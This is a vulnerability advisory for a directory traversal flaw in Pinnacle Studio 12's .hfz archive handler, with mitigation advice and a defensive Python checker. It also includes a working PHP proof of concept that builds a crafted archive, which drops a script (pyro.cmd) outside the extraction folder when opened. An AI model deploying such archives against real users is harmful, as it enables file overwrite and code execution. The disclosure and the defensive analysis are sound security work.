Vendor: Pinnacle Studio
By: Nine:Situations:Group::pyrokinesis
CVSS: 7.5 (HIGH)
CWE: 22 (Directory Traversal)
Product Name: Pinnacle Studio
Affected Version From: Pinnacle Studio 12
Affected Version To: Pinnacle Studio 12
Patch Exists: NO
Related CWE:
CPE: a:pinnacle_systems:pinnacle_studio:12
Metasploit:
Other Scripts:
Platforms Tested: Windows

Pinnacle Studio 12 “Hollywood FX Compressed Archive” (.hfz) directory traversal vulnerability poc

Pinnacle Studio 12 registers InstallHFZ.exe as the shell Open handler for .hfz ("Hollywood FX Compressed Archive") files (see the HKEY_CLASSES_ROOT\hfzfile\shell\Open\command key in the PoC's registry dump). The handler decompresses an archive's entries to the paths stored in the archive without prompting and without rejecting ..\ components, so a crafted .hfz can overwrite any file the user can write to, or drop a script into a Startup folder. Opening the file is enough to trigger extraction; the PoC below writes puf.hfz, whose single entry is named ..\..\..\..\..\..\..\..\pyro.cmd.

Mitigation:

The vendor should validate each entry name before extraction: reject names containing .. components, absolute paths or drive letters, and confirm that the normalised target path still lies inside the extraction folder. No patch is listed (Patch Exists: NO), so users should not open .hfz files from untrusted sources; because the file type has a registered shell Open handler, double-clicking the file is sufficient to extract it.

Exploit-DB raw data:

<?php
    /*
    Pinnacle Studio 12 "Hollywood FX Compressed Archive" (.hfz) directory
    traversal vulnerability poc
    by Nine:Situations:Group::pyrokinesis
     
    Our site: http://retrogod.altervista.org/
    Software site: http://www.pinnaclesys.com/
     
    Some keys exported from the registry:
     
    [HKEY_CLASSES_ROOT\.hfz]
    @="hfzfile"
     
    [HKEY_CLASSES_ROOT\.hfz\hfzfile]
     
    [HKEY_CLASSES_ROOT\.hfz\hfzfile\ShellNew]
     
    [HKEY_CLASSES_ROOT\hfzfile]
    @="Hollywood FX Compressed Archive"
     
    [HKEY_CLASSES_ROOT\hfzfile\DefaultIcon]
    @="C:\\WINDOWS\\Installer\\{D041EB9E-890A-4098-8F94-51DA194AC72A}\\_A7BEE02B_CF3C_4710_85A0_92A3876E6F9C,0"
     
    [HKEY_CLASSES_ROOT\hfzfile\shell]
     
    [HKEY_CLASSES_ROOT\hfzfile\shell\Open]
     
    [HKEY_CLASSES_ROOT\hfzfile\shell\Open\command]
    @="\"C:\\Documents and Settings\\All Users.WINDOWS\\Documenti\\Pinnacle\\Content\\HollywoodFX\\InstallHFZ.exe\" \"%1\""
    "command"=hex(7):70,00,7e,00,46,00,78,00,6b,00,3f,00,49,00,63,00,69,00,38,00,\
    79,00,2b,00,37,00,32,00,6f,00,21,00,31,00,61,00,68,00,31,00,48,00,46,00,58,\
    00,3e,00,49,00,4d,00,53,00,27,00,73,00,50,00,7a,00,2e,00,6a,00,3d,00,34,00,\
    70,00,41,00,5b,00,4e,00,72,00,64,00,29,00,70,00,76,00,20,00,22,00,25,00,31,\
    00,22,00,00,00,00,00
     
    Usually files are decompressed in a Pinnacle effects folder...
    Problem is ... that .hfz files can be used to overwrite files on the target system
    or placing scripts in Startup folders by directory traversal attacks
    and InstallHFX.exe decompresses them with no prompts!
    Just modified an existing .hfz file and here it is the dump ...
    Also I experienced some crashes in doing this... investigating...
     
    */
     
    // Entry name stored in the archive: eight "..\" components followed by the
    // file name. The handler joins this to its output folder without checking
    // it, so pyro.cmd is written far outside the effects folder.
    $____path = "..\\..\\..\\..\\..\\..\\..\\..\\pyro.cmd";
     
    $____payload = "\x48\x46\x58\x5a\x48\x46\x58\x5a\x9c\x07\x00\x00\x49\x00\x00\x00". "\x00\x21\x00\x00\x00\x7e". $____path. "\x65\x07\x00\x00\xa8\x1c\x00\x00\x8d\xc2\x71\x5a". "\x78\x9c\xbd\x59\x7b\x4c\x53\x57\x1c\xbe\x05\xf6\x10\x96\x6c\x0b". "\x33\xab\x2f\x5a\x2d\xe0\xe4\xdd\xd6\x84\xf2\x18\xbd\x2d\x6f\x04". "\x8a\xa5\x50\x44\x50\xcb\x1b\x05\x8a\x3c\xb4\x22\x8e\x25\x26\xcb". "\xd4\x64\xee\x8f\x2d\x9b\xcb\xe6\xd4\x2c\x21\xd3\x65\x6e\x59\xa2". "\x5b\x8c\x01\x97\xa8\x89\xc1\x05\xf7\xd7\xd8\x12\xcd\xc8\x12\x51". "\xf7\x62\xe0\x03\x5f\x77\xdf\xed\x69\x2f\xb7\xb7\xb7\xb7\xe5\xb2". "\xec\xe4\x77\x2e\xe7\x9e\x7b\xce\xef\x7c\xf7\xfb\x3d\xce\xb9\xa5". "\xa8\xa0\x26\xbf\x28\x3f\x4f\x97\x42\x51\x54\x24\xaa\xd9\x54\x99". "\x5c\xd1\xde\xad\x4e\xd3\xe3\x86\x3a\xd4\xd1\x9a\x13\x45\x7a\x93". "\x2a\x4a\x51\xad\x16\xb6\x5b\x41\x29\x5c\x54\x71\x59\xa1\x76\xf0". "\x15\x8a\x0a\x53\x84\x47\xa4\xa1\x33\x16\xd5\xfb\x37\x70\x79\xd3". "\xc8\xaf\x76\x3b\x13\x54\xaa\xab\x9f\x86\x32\xec\x3f\x97\x50\xd6". "\x4d\x4c\x1c\x0a\x2a\x09\x09\x6f\x48\x0f\x08\x65\xa1\xaa\xaa\x27". "\x16\xcb\x7d\xc8\x22\xf1\x00\x4c\x7a\xfa\x90\x46\xb3\x3b\x14\xe4". "\x44\x44\x17\x6a\x69\x61\x76\xee\x64\x6c\xb6\xc7\x10\x09\x3c\x4c". "\x5c\x9c\x3c\x79\x1a\x1b\xcb\xbf\x95\xc6\xd3\xdd\xcd\x6c\xde\xcc". "\x6c\xdc\x38\x07\x7e\x9c\x4e\xc6\x6a\x7d\x88\x76\x40\x3c\xa9\xa9". "\xf7\x56\xae\x0c\x02\x20\x21\xe1\xa1\x5a\x2d\x31\x60\xe2\xcc\x19". "\xbe\xf8\x2f\x04\x0c\xe0\x07\xd7\xca\xca\x47\x5b\xb7\x32\xa5\xa5". "\xb3\x25\x25\xff\x04\xe4\x67\xfd\xfa\x07\x31\x31\x8f\xd7\xac\x09". "\xb4\x1c\xc0\xb0\x78\xd2\xd3\xef\xaf\x5a\x25\x0f\x0f\x64\x60\x80". "\xb5\x17\x50\xa1\x8d\x6b\x4d\x0d\x53\x5b\x1b\x00\x0f\x4d\x33\x26". "\x93\xc0\x04\x44\xe6\x62\x63\x87\x95\x4a\xc8\x1d\x70\xa8\xd5\x4a". "\xf0\x33\x7b\xed\xda\x0f\xa7\x4e\x49\xe0\x81\xdb\x13\x4e\x60\x3e". "\xc2\x18\xb1\x1a\xdf\xc9\xe7\x75\xc6\xc7\xcf\xa9\x54\xb3\xcb\x97". "\x0b\x50\x4d\xb9\xcb\x65\x9b\x6b\x9a\xb0\x97\x98\xc8\xac\x5d\x8b". 
"\xc6\xa3\xd5\xab\xfd\xf9\xf9\xf1\xf4\x69\x09\x3c\x44\x0a\x0b\xff". "\x22\x60\x7a\x7a\x3c\x44\x01\xe7\x86\x0d\x33\xe4\x29\x56\xf7\x01". "\x60\x36\xb3\x0b\xe9\xf5\x5c\xe7\x6d\x77\x99\xd8\xba\x7f\x9a\xb3". "\xa6\xc1\xc0\x5e\x4d\x26\x51\x7b\x4d\x5d\xbc\x28\x8d\x07\x02\x4b". "\x11\x5a\x9a\x9b\x59\x3c\xad\xad\xec\x6d\x47\x87\x78\x7c\xb1\x48". "\x52\x53\xe1\xc0\x84\x01\x82\xe7\x6a\xcd\xc0\xb4\xc0\xbb\x32\x32". "\xf8\x2f\x12\x8a\xff\x08\xa4\xa8\xe8\x6f\xe0\x81\xc9\xca\xcb\xef". "\x21\x1b\x80\xb1\x80\xf1\x1e\x1f\xef\x01\x96\x99\x49\xf0\x7c\x91". "\xd7\x26\xc4\xc3\x49\x72\x32\xae\x93\x23\x23\x0b\xc5\x43\x04\x90". "\x20\x68\xec\xd8\xc1\x72\x25\x11\xc2\x0f\xd6\xac\x99\xd1\x68\x08". "\x9e\xc3\x7a\x3b\xf0\xf8\x3b\x3c\xd7\xf3\xf3\xd9\xb3\x80\x71\x65". "\x78\x78\xa1\x78\x88\xa5\x90\x04\x48\xdc\x91\xe0\x12\x8d\xe2\xdf". "\xba\x3e\x44\x58\x11\x3c\xfb\xd3\x6c\x1c\x3f\xa2\x61\x48\x60\x5c". "\x3f\x77\x4e\x06\x1e\x22\x34\x3d\x55\x5f\xcf\x20\xa0\xe0\xc3\xac". "\xce\xec\x6c\xc1\x8b\x03\x46\xd2\xd2\xd5\x04\xcf\x50\x8a\x15\x78". "\x66\x96\x2d\x93\x88\x77\x79\xf6\xe2\x0b\xd2\x91\x27\xc9\xa8\x54". "\x82\x64\x48\xf0\x70\x65\xdf\x6b\x65\x7f\xa8\x54\x4f\x34\x1a\x8c". "\x14\xc5\x83\x80\xad\xab\x63\x75\xba\x5c\x9e\xd4\x27\x0f\x12\x5f". "\xe7\xdd\x15\x2b\x18\xa3\x91\x6f\x3b\x0e\xcf\x50\x42\xb9\xc7\x5e". "\x08\xf3\x82\x02\x7f\x3c\x44\x1b\x49\x74\x48\xc2\xc8\x2d\xd8\xd0". "\x17\x89\x87\x64\x39\x6c\x1c\x10\x01\xa4\xb7\x12\xca\x89\xdb\x60". "\x00\x1a\xe4\xea\x8f\x67\xef\x5e\xa6\xa2\xe2\xc1\xf6\xed\x32\xc9". "\x09\x18\xef\x49\x49\xdc\xee\x79\x43\xad\xbe\x2c\xd8\x6d\xe3\xe3". "\x81\x07\xb6\xf3\xc7\x63\x77\x6f\x0a\x70\x4b\xd1\xb5\xf2\xf2\x7e". "\x97\x89\x87\x64\xe0\x94\x14\xa9\x7d\xdf\x68\x84\xcb\x71\xc0\x82". "\x2e\xb4\x6b\x17\x0b\x15\x3b\xbb\x1c\x3c\x71\x71\xac\x17\x91\xb8". "\x93\x90\xac\x2c\xce\xb2\xd2\xab\x20\xbd\x60\x77\x40\x86\x41\x1e". "\x16\x3d\xf9\x70\x27\xcc\x20\x2b\x86\x2c\x12\x60\xb0\x5b\xc1\xc3". "\xe1\xea\x84\x1c\x04\x20\x12\x20\x4e\x65\x12\x53\x2c\x96\x5b\x34". 
"\x7d\x2e\x3b\xfb\xeb\xf0\xf0\xe7\x15\x0a\xc5\xf8\xf8\x38\x17\x59". "\x4a\xa5\xb2\x25\xc1\x66\x30\x0c\xe7\xe5\x9d\xed\xef\x9f\x95\xed". "\xa8\x90\xe2\xe2\x69\x72\x50\x04\x1b\x88\x3e\x89\x00\x3c\x5a\xff". "\xd5\x65\xc7\xe1\x0f\x8a\x9d\x1f\x97\xb8\xb0\xb4\xc9\x74\xe1\xd2". "\xa5\x4b\x1c\xa4\x88\xb0\x70\xbb\xe9\xdd\xa2\xa2\xef\x2a\x2b\xef". "\x6d\xd9\xc2\x1e\xed\xf8\x0c\x87\xfe\xb5\x82\xd0\xc3\x60\xd8\x0e". "\x48\x36\x6d\x62\x7b\xba\xba\x44\x86\x61\x39\x7c\x36\x69\x34\x9a". "\xba\xba\xfa\x77\x68\x27\xf0\x64\x64\x7c\x8e\x1e\x0e\x0f\xda\xb5". "\xba\x01\x9a\xbe\x68\xb3\x3d\x82\x4e\x37\x9f\xf7\x17\xf3\xd1\x84". "\x97\xb2\xf3\x92\x15\xd9\x4f\x39\x99\x98\x98\x20\xeb\xe2\xdc\x65". "\x50\x26\xef\xd1\x37\x64\x19\x3e\x8b\x8a\x8a\xe2\xe3\xc9\x32\x9c". "\xac\xa8\xb8\xd3\xde\xce\x8e\x87\x1b\x00\x0c\xf4\x2c\x06\x12\x72". "\x14\xdc\x1b\x2c\x35\x34\x30\x4d\x4d\x9e\xc3\x06\x61\x9b\x4f\x85". "\xcb\xe5\x22\x5f\x99\xfc\xcd\xe2\x99\xb0\x88\x92\x92\x5f\x0a\x0a". "\xfe\xc4\x78\xf8\x21\x08\x07\x4b\x7d\x7d\x8c\xc3\xc1\x48\x7f\xbc". "\x04\x75\x72\xac\x0e\xdf\x6e\x6b\x63\x4d\x09\x23\x92\xd0\x4b\x4d". "\x3d\x74\x3b\x70\x01\xc2\xda\x9c\x63\x55\x55\x8f\x89\x12\x4c\x21". "\xd2\xd8\xc8\x12\x0e\x9d\x38\x4d\xc9\x66\x69\xdb\x36\x76\x5b\x81". "\x12\xe0\x21\xa9\x60\x70\x90\xed\x17\x10\xc2\x95\xc9\xc9\x49\xda". "\xf0\x49\x75\xb5\x30\x10\xb8\x2f\x17\x38\x52\x6f\xaf\xd4\xf7\x54". "\x50\x41\x74\xec\xde\xed\xc9\x4b\x50\x88\x36\x10\xe2\xd8\x1f\x1d". "\x9d\x0e\x2a\x38\x24\x37\x6f\xde\x8c\x8c\x8c\xb4\x5a\x67\x02\xe9". "\x01\x12\x58\x1f\xc1\x8b\xb7\x83\x06\xec\x5c\x65\x65\x77\x65\x13". "\x05\xc1\x7b\xd9\xdd\x99\x13\x0a\xe1\x51\xa4\x93\xa6\xcf\x47\x46". "\xc6\x28\x95\x85\x36\x5b\x90\x0f\x6d\xbb\x7b\x0b\x20\xfe\x83\x78". "\x21\x9c\xcb\x76\x27\xbb\x3b\x3b\xe1\x8a\xbd\x0f\x07\x57\x34\x48". "\x42\x58\x28\xed\xb0\x54\x67\x27\x1b\x14\x08\x3d\x72\xe0\x44\xbc". "\xc8\x86\x04\x72\x48\x03\x84\x93\x2c\x07\xce\x83\x6e\x79\xfe\x82". "\xb4\x06\xae\xc8\xdb\xe5\xe6\xde\xe1\x82\xd7\x5f\x42\x4c\x11\xe4". 
"\x68\x07\x6f\x87\xc8\xce\x2a\x5c\xc0\xf6\xf7\x33\x24\x53\xc9\x16". "\xd0\x02\x25\x7b\xf6\x2c\x4a\x89\xc9\x74\x0b\x2e\x84\x24\x40\x72". "\xf8\xe2\x45\xde\x09\x53\x20\x41\x7f\x71\xfa\xff\x85\x6f\x71\x4b". "\x85\x4d\x67\x45\x7a\x9b\x0a\x9f\xff\x75\x91\x2b\x0a\x4f\x25\x17". "\xae\xc1\xfe\xf0\x48\xb3\x8d\x70\xfe\x14\x3c\x8a\xe1\xcd\x3d\x92". "\x5f\x5e\xad\x9d\x43\x63\xfc\x39\xaf\x66\x93\x8a\xb4\xc2\xa9\x08". "\xd1\x5f\x36\x97\x84\xf4\xab\xe7\xd5\xb1\xd2\x1c\xe1\xbc\x0b\x63". "\xa5\xc6\xd6\x96\xf8\x11\x8a\x1a\x1d\xf1\x7d\x46\x1b\xbd\xf5\xea". "\xd8\x98\xcf\x3c\x05\x59\x6f\x54\xaf\xff\x06\x73\xe8\x51\xc1\x82". "\xc6\xf9\xea\xc3\x49\xe8\xf3\xbc\x04\x5c\xe3\x08\x30\x87\x42\x00". "\x1d\x4c\xf1\x47\x47\x96\x89\x01\x0a\x3a\x0f\xc4\x19\x7d\x1f\x2d". "\xa1\xd2\x22\xed\x23\x85\xbf\x66\x4a\x12\x27\x24\x20\x54\x43\x51". "\x65\xf9\x79\x5a\xd6\xb7\x8e\xbd\x38\xff\x88\xa2\x5e\x40\x2d\x72". "\xf6\xf6\xa9\xab\xdb\x9b\x9a\x9d\x6a\xbd\xf0\x3e\x82\xe2\x8f\x16". "\x96\x97\xd6\xe2\x72\xc4\xab\xf9\xb8\x94\x66\xad\xf0\x7e\x21\x9a". "\x4f\x48\x69\xd6\x09\xef\x43\xd1\x5c\x69\x2d\xd0\x9e\x44\xe3\xed". "\x68\xfe\x58\xf7\x7f\x0c\x1c\x8d\x3b\x9a\x7a\x9c\xdd\x6a\x3d\x45". "\x0d\x19\xe7\xab\xb8\x36\x91\xa2\xa0\xc2\x28\x12\x93\x34\xed\x3f". "\xcd\x4b\xbf\x58\xe1\x59\xab\xc9\x8b\x14\x25\xcc\x7d\x65\x11\x0f". "\xe3\xef\x01\x1f\xc4\xac\x37\x7b\x08\x15\x81\xcb\xd5\xf3\x5d\xd4". "\x20\xfa\xcc\x22\x60\xa5\xe1\x1e\x0f\x09\x2e\xfb\x3f\x95\x68\x4f". "\x65\xdb\x2f\xcf\xc3\x3d\x18\x00\xae\x4e\x16\xbb\xc1\xe0\x9e\x90". "\x0b\x37\xd7\x54\xa6\xeb\x45\xb3\xfb\x55\x3e\x5c\xf6\x61\x99\xa3". "\xbd\x4b\x9d\xeb\xe8\x6c\xee\x71\xf8\x68\xa3\x03\x69\xbf\xd2\x13". "\x6b\x46\x7a\x7b\x9d\xa2\xb6\x99\xac\xdf\x1e\xcd\xf1\x56\xf6\x99". "\xe2\xbd\xf7\xa3\x15\x0a\xde\x34\xd7\xf5\xf5\x16\x73\x89\xf6\x53". "\x34\x69\x15\x7f\xe9\x67\x29\xe2\x8a\x6a\xfd\x3a\xb4\xf6\x76\xf7". "\x38\x9b\xba\x1d\x7d\x6d\xfb\x32\x2d\x0d\xdb\x9b\x1b\xfb\x7a\x33". "\xd3\xd2\xd4\xc9\xea\x5c\x67\x67\xa7\xb3\x2b\x93\x0c\x4c\x69\x6b". 
"\x71\x0a\x40\x8d\x0a\x38\xa0\x79\x55\xbc\x28\xdc\x21\x21\xdc\x3e". "\x10\x84\x5e\x98\x26\x3f\x98\x05\x1d\x8e\x3e\xb5\x36\x04\x98\x64". "\xa0\x17\x66\x65\xd6\x8d\x9c\x75\x75\xc6\x91\xef\xef\xfe\xe4\x93". "\xed\x96\x7e\x99\x6e\xf4\x56\x0f\x24\x31\x98\x07\xa4\x61\x9a\xc5". "\x61\xea\x42\x85\xa9\xe3\xb1\x19\x34\x99\x4b\xc0\x3c\x28\x0e\xf3". "\x5f\x77\x19\xc2\x8e\x00\x00\x48\x46\x58\x5a\x28\x00\x00\x00\x44". "\x00\x00\x00\x00\x11\x00\x00\x00\x7e\x6f\x72\x67\x73\x3a\x65\x66". "\x66\x65\x63\x74\x73\x2e\x6f\x72\x67\x00\x00\x00\x00\x00\x00\x00". "\x00\x00\x00\x00\x00\x34\x00\x00";
     
    // Write the crafted archive in binary mode: the payload contains 0x0a bytes
    // that text mode would mangle on Windows. Open puf.hfz with the registered
    // .hfz handler to trigger extraction.
    $_f = fopen("puf.hfz", "wb");
    if ($_f === false) {
        die("cannot create puf.hfz\n");
    }
    fwrite($_f, $____payload);
    fclose($_f);
     
?>

# milw0rm.com [2009-05-13]
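The registry dump and the PoC above give the two ingredients: a shell Open handler that extracts without prompting, and an archive whose entry name starts with eight ..\ components. The script below is an added example and is not part of the original PoC or of Pinnacle's code. It parses the entry name out of the PoC's own header bytes (the field layout, including the leading '~' marker, is inferred from those bytes and is an assumption; the container format is otherwise undocumented here), shows where an extractor that trusts the stored name would write the file, and applies the check the Mitigation section asks for: refuse .. components, rooted, drive-prefixed and UNC names, and confirm the normalised target still sits under the extraction folder. The extraction root is an assumed path, since the page only says "a Pinnacle effects folder". Because it uses ntpath for Windows path rules, it runs on any platform.

```python
import ntpath
import struct

# Container magic as seen at offset 0 of the PoC's puf.hfz.
MAGIC = b"HFXZHFXZ"

# Start of the PoC's payload, copied from the page above. The zlib stream that
# follows the 0x78 0x9c header is omitted: only the entry name matters here.
POC_PATH = b"..\\..\\..\\..\\..\\..\\..\\..\\pyro.cmd"
POC_HEADER = (
    MAGIC
    + b"\x9c\x07\x00\x00" + b"\x49\x00\x00\x00"  # two u32 fields, not decoded here
    + b"\x00"                                    # one byte, not decoded here
    + b"\x21\x00\x00\x00"                        # u32 0x21 = 33 = len(b"~" + POC_PATH)
    + b"\x7e" + POC_PATH                         # '~' marker, then the stored path (assumption)
    + b"\x65\x07\x00\x00\xa8\x1c\x00\x00\x8d\xc2\x71\x5a"  # three u32 fields, not decoded
    + b"\x78\x9c"                                # zlib stream header
)

# Assumed extraction folder; the page does not give the real one.
EXTRACT_ROOT = r"C:\Pinnacle\Content\HollywoodFX"


def parse_entry_name(data: bytes) -> str:
    """Return the stored path of the first entry.

    Layout inferred from the PoC bytes (an assumption, not vendor
    documentation): magic, 8 bytes, 1 byte, u32 little-endian name length,
    then the name. The leading '~' is stripped on the assumption that it is a
    marker rather than part of the path.
    """
    if not data.startswith(MAGIC):
        raise ValueError("not an HFXZ container")
    off = len(MAGIC) + 8 + 1
    if len(data) < off + 4:
        raise ValueError("truncated header")
    (name_len,) = struct.unpack_from("<I", data, off)
    off += 4
    name = data[off:off + name_len]
    if len(name) != name_len:
        raise ValueError("truncated name field")
    if name.startswith(b"~"):
        name = name[1:]
    return name.decode("latin-1")


def is_traversal(name: str) -> bool:
    """True when the stored path could leave the extraction folder."""
    normalized = name.replace("/", "\\")
    parts = normalized.split("\\")
    return (
        normalized.startswith("\\")                # rooted on the current drive
        or ntpath.splitdrive(normalized)[0] != ""  # drive letter or UNC prefix
        or ".." in parts                           # parent-directory component
    )


def naive_target(root: str, name: str) -> str:
    """What an extractor that trusts the stored name does: join and normalise.

    The '..' components walk up past the root; Windows path normalisation
    then discards the surplus ones, leaving the file at the drive root.
    """
    return ntpath.normpath(ntpath.join(root, name))


def safe_target(root: str, name: str):
    """Hardened join: the target path, or None if the entry must be refused.

    The syntactic check and the post-normalisation containment check are
    both applied, so a name that merely looks harmless is still caught.
    """
    root_norm = ntpath.normpath(root)
    if is_traversal(name):
        return None
    target = ntpath.normpath(ntpath.join(root_norm, name))
    if ntpath.commonpath([root_norm, target]) != root_norm:
        return None
    return target


def scan_hfz(data: bytes, root: str = EXTRACT_ROOT) -> dict:
    """Report on the first entry: stored name, where a naive extractor would
    write it, and whether a hardened extractor would accept it."""
    name = parse_entry_name(data)
    return {
        "name": name,
        "traversal": is_traversal(name),
        "naive_target": naive_target(root, name),
        "safe_target": safe_target(root, name),
    }


if __name__ == "__main__":
    for key, value in scan_hfz(POC_HEADER).items():
        print(f"{key}: {value}")
```

For the PoC header the report shows the stored name, a naive target of C:\pyro.cmd (the three folders under the assumed root are consumed by three of the eight ..\ components and the rest are dropped by normalisation), and a refused safe target. A benign name such as effects\example.hfx (constructed) resolves under the root and is accepted.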